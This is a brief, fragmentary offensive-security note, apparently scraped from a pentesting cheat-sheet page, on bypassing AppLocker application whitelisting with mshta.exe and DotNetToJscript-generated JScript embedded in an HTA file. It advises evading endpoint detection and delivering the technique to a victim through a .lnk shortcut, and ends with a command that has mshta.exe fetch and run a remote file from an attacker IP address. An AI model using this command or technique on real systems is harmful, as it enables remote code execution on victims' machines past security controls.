AppLocker Bypass with JScript
Last updated
Last updated
Note that mshta.exe will download the .hta file before its execution, so we must still bypass any installed endpoint detection software.
Jscript code generate with DotNetToJscript and embed it in the hta
file
See
This application whitelisting technique can also be leveraged through a shortcut file that we provide to the victim: .lnk
mshta.exe http://192.168.119.120/test.xsl